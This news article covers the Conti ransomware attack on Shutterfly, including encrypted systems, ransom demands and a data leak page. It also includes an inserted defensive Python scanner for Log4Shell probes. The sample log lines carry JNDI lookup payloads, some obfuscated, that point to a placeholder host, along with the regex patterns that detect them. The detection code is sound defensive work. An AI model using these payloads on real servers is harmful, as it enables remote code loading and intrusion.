Shutterfly reports ransomware attack, supposedly by the Conti group

The digital photography company reported the ransomware attack over the weekend

Conti affected the servers of Shutterfly. The company reported the attack that is now linked with the Conti ransomware group.

Services were disrupted, and some sources attribute the incident to a particular ransomware group. The personalized photography giant suffered a ransomware attack that encrypted data on devices and potentially resulted in stolen corporate files.[1] Conti ransomware[2] is supposedly to blame. According to the company, parts of the Lifetouch and BorrowLenses businesses were affected. Groovebook, manufacturing offices, and other corporate systems also experienced interruptions.[3]

Law enforcement has been contacted and has responded to this cybersecurity incident. The company also states that no sensitive customer details were accessed, to reassure those who might be affected:

As part of our ongoing investigation, we are also assessing the full scope of any data that may have been affected. We do not store credit card, financial account information, or the Social Security numbers of our Shutterfly.com, Snapfish, Lifetouch, TinyPrints, BorrowLenses, or Spoonflower customers, and so none of that information was impacted in this incident.

Shutterfly is a photography-related services company serving consumers, enterprises, and education customers. Its brands include BorrowLenses, Snapfish, Lifetouch, and GrooveBook. The main Shutterfly.com site lets users upload photos and create photo books, greeting cards, postcards, personalized stationery, and more.

Conti ransomware group encrypted 4,000 devices

It is reported[4] that the Conti file virus is the one to blame. The attack was active for a few days, and the malware gang claims to have encrypted at least 4,000 devices and 120 servers. The company has not confirmed this, but negotiations were reportedly held between the attackers and officials.

Cybercriminals demanded millions of dollars in ransom, payable in exchange for a possible file recovery tool. Ransomware can run in the background for days or weeks, so the infection can collect documents, corporate data, and other files to use later as leverage, forcing victims to pay the demanded sum in cryptocurrency.

Stolen data threatened to be publicly leaked

The Conti ransomware gang created a data leak page for the Shutterfly files, displaying screenshots of files supposedly stolen from devices and servers during the infection. Double-extortion[5] tactics are becoming more popular among ransomware operators. The blackmailers threaten to make the site public if their ransom demands are not met.

The screenshots on the site included legal agreements, bank information, merchant account details, login credentials for services, spreadsheets, and some customer information with partial credit card numbers. The Conti group also claimed to have obtained the source code for the Shutterfly store, but it is not confirmed which website the criminals have in mind.

The attack started a few weeks ago, and a deep dive into conversations and discussions on various forums found members of this gang talking about the possibilities of exploiting the Log4j vulnerabilities.[6] The sophisticated ransomware group might weaponize the flaw to access servers and find their way to systems and devices storing valuable data.
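Because the article only names Log4j as a possible entry vector, here is an added example of what a defender can check for on the server side: a small scanner that flags web-server log lines carrying the `${jndi:...}` lookup string abused by the Log4j flaw (CVE-2021-44228), including the nested-lookup obfuscations such as `${${lower:j}ndi:...}` commonly seen in scanning traffic. This is illustration code written for this page, not Shutterfly's tooling and not anything from the Conti investigation; the log lines are constructed, and the `example.invalid` hosts in them are placeholders.

```python
"""Scan web-server access logs for Log4Shell-style JNDI lookup strings.

Added illustration for the Log4j point in the article; it is not Shutterfly's
tooling nor anything from the Conti investigation. The sample log lines are
constructed. The pattern ${jndi:...} is the Log4j lookup syntax abused by
CVE-2021-44228; probes often obfuscate it with nested lookups such as
${${lower:j}ndi:...} or ${${::-j}ndi:...}, which this scanner unwraps.
"""
import re

# Constructed sample access log (Combined Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2021:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Dec/2021:10:01:40 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://example.invalid/a}"
10.0.0.9 - - [12/Dec/2021:10:02:03 +0000] "GET /?x=${${lower:j}ndi:rmi://example.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.12 - - [12/Dec/2021:10:02:30 +0000] "POST /api HTTP/1.1" 200 64 "-" "python-requests/2.26"
"""

# A direct JNDI lookup: "${jndi:" with optional whitespace, any letter case.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# One innermost Log4j lookup with no nested "${" inside it, e.g. ${lower:j}
# or ${::-j}; group 1 is the value the lookup would evaluate to.
INNER_LOOKUP_RE = re.compile(r"\$\{[^${}]*?:-?([^${}:]*)\}")

MAX_UNWRAP_ROUNDS = 10  # bound the work on adversarial deeply nested input


def is_jndi_lookup(text: str) -> bool:
    """Return True if text contains a (possibly obfuscated) ${jndi:...} lookup."""
    for _ in range(MAX_UNWRAP_ROUNDS):
        if JNDI_RE.search(text):
            return True
        # Replace every innermost lookup by its result, emulating what Log4j
        # would do before the jndi prefix becomes visible.
        unwrapped = INNER_LOOKUP_RE.sub(lambda m: m.group(1), text)
        if unwrapped == text:
            return False  # nothing left to unwrap and no jndi prefix seen
        text = unwrapped
    return bool(JNDI_RE.search(text))


def find_log4shell_probes(log_text: str) -> list:
    """Return 1-based line numbers of log lines carrying a JNDI lookup."""
    return [n for n, line in enumerate(log_text.splitlines(), start=1)
            if is_jndi_lookup(line)]


if __name__ == "__main__":
    for n in find_log4shell_probes(SAMPLE_LOG):
        print(f"line {n}: possible Log4Shell probe")
```

Run it over a real access log by passing the file contents to `find_log4shell_probes`; a hit means a request carried the lookup string, which is worth correlating with outbound LDAP/RMI connections from the host, since that is the step at which the lookup becomes an actual compromise rather than a scan.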

The Conti ransomware gang has already made headlines for its attacks, and research on the logs shows that the operators have made $150 million in the last six months. The group's expansion started in November, when the attackers researched and started to use new vectors and actively targeted vCenter networks. Researchers reported at least 400 attacks involving Conti malware targeting organizations in the US and international enterprises.

About the author
Gabriel E. Hall - Passionate web researcher

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.

